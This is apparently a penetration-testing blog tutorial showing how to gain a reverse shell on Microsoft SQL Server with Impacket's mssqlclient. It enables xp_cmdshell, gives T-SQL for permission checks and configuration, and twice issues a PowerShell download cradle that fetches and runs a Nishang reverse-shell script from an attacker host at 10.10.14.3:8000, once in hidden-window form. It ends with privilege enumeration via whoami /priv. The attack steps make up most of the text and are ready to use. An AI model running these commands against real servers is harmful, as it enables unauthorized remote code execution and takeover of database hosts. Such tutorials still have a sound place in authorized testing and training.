I would like to share how to create a reverse shell with Impacket's mssqlclient, which uses the xp_cmdshell functionality of SQL Server.
You can install Impacket from its GitHub repository, available at https://github.com/SecureAuthCorp/impacket
I have shared tutorials on activating xp_cmdshell manually at https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell/ and https://rioasmara.com/2020/01/31/mssql-rce-and-reverse-shell-xp_cmdshell-with-nishang/
With Impacket's mssqlclient you do not need to do the manual work of building the sp_configure queries in T-SQL to activate xp_cmdshell. Impacket does that for you.
You can connect to the database using the command below. The -windows-auth flag tells mssqlclient to authenticate with Windows (NTLM) credentials instead of a SQL Server login, and since no password is given on the command line it will prompt for one:
mssqlclient.py rio_services@192.168.12.1 -windows-auth
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: None, New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(RIODB): Line 1: Changed database context to 'master'.
[*] INFO(RIODB): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (140 3232)
[!] Press help for extra shell commands
If you type help you will get information like below
SQL> help
lcd {path} - changes the current local directory to {path}
exit - terminates the server process (and this session)
enable_xp_cmdshell - you know what it means
disable_xp_cmdshell - you know what it means
xp_cmdshell {cmd} - executes cmd using xp_cmdshell
sp_start_job {cmd} - executes cmd using the sql server agent (blind)
! {cmd} - executes a local shell cmd
You need to run enable_xp_cmdshell before you can execute commands remotely. Behind the scenes this runs sp_configure, which requires the ALTER SETTINGS server permission (held by members of the sysadmin and serveradmin roles), so the login you connect with must have that level of access or the step will fail.
SQL> enable_xp_cmdshell
[*] INFO(RIODB): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(RIODB): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
There will be output like the above, but you do not need to run the RECONFIGURE statement yourself, since Impacket has already done it for you as part of enable_xp_cmdshell.
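For reference, this is what the enable_xp_cmdshell shortcut does for you, written out in T-SQL, together with a permission check before and a state check after. This is an added example and not Impacket's own code or a query from the original tutorial; it uses only standard SQL Server system procedures and views, and can be pasted into the SQL> prompt one statement at a time.

```sql
-- Added example: what Impacket's enable_xp_cmdshell does for you, spelled out in T-SQL.

-- 0. Confirm the login can change server configuration. sp_configure needs the
--    ALTER SETTINGS server permission, which sysadmin and serveradmin members hold.
--    1 = yes, 0 = no.
SELECT IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin,
       HAS_PERMS_BY_NAME(NULL, NULL, 'ALTER SETTINGS') AS can_alter_settings;

-- 1. xp_cmdshell is an "advanced option", so advanced options must be exposed first.
EXEC master.dbo.sp_configure 'show advanced options', 1;
RECONFIGURE;

-- 2. Turn xp_cmdshell on. RECONFIGURE is what actually applies the change;
--    without it value_in_use stays 0 and xp_cmdshell still refuses to run.
EXEC master.dbo.sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

-- 3. Verify: value is the configured setting, value_in_use is the active one.
--    Both rows should now show 1 / 1.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell');

-- 4. Smoke test: shows the Windows account the SQL Server service runs as,
--    which is the account every xp_cmdshell command will execute under.
EXEC master.dbo.xp_cmdshell 'whoami';

-- Cleanup when finished (this is what disable_xp_cmdshell does).
EXEC master.dbo.sp_configure 'xp_cmdshell', 0;
RECONFIGURE;
EXEC master.dbo.sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Step 3 is the check worth keeping: if value is 1 but value_in_use is still 0, the option was set but RECONFIGURE was never run, which is exactly the situation the "Run the RECONFIGURE statement to install" message warns about.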
The next step, if you want a reverse shell, is to run the command below, which connects back to the netcat listener defined in the Nishang PowerShell script:
SQL> xp_cmdshell powershell IEX(New-Object Net.webclient).downloadString(\"http://10.10.14.3:8000/rv.ps1\")
The above command is a reverse shell using the Nishang framework. You can find the details of how to prepare the Nishang reverse shell in my previous tutorial.
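One quoting caveat is worth knowing: the mssqlclient shortcut expands `xp_cmdshell <cmd>` into `exec master..xp_cmdshell '<cmd>'`, so any single quote inside your command ends the string early and the query fails. The added example below (mine, not code from the original tutorial or from Impacket) shows the same download cradle issued as a raw T-SQL statement with the inner quotes doubled, and a second call that collects command output in the SQL session. It assumes 10.10.14.3:8000 is serving rv.ps1 (the Nishang script, which holds the listener address) and that xp_cmdshell is already enabled.

```sql
-- Added example (not from the blog or Impacket): the Nishang download cradle issued as a
-- raw T-SQL statement instead of through the mssqlclient shortcut.
-- Assumptions: 10.10.14.3:8000 serves rv.ps1 and xp_cmdshell is already enabled.

-- Inside a T-SQL single-quoted string, a literal single quote is written as ''.
-- cmd.exe receives: powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.3:8000/rv.ps1')"
EXEC master.dbo.xp_cmdshell
    'powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString(''http://10.10.14.3:8000/rv.ps1'')"';
-- xp_cmdshell does not return until the process it launched exits, so the SQL> prompt
-- stays blocked for as long as the reverse shell is alive. That is expected, not an error.

-- When you want the command's output back in the SQL session rather than a callback,
-- collect it in a temp table. xp_cmdshell returns one row per output line, with a
-- trailing NULL row, so filter that out.
CREATE TABLE #out (line NVARCHAR(4000));
INSERT INTO #out EXEC master.dbo.xp_cmdshell 'whoami /priv';
SELECT line FROM #out WHERE line IS NOT NULL;
DROP TABLE #out;
```

The first statement is the one to reach for when a command needs single quotes (PowerShell string literals, paths with spaces wrapped in quotes); the second is useful for quick enumeration before deciding whether a full reverse shell is needed at all.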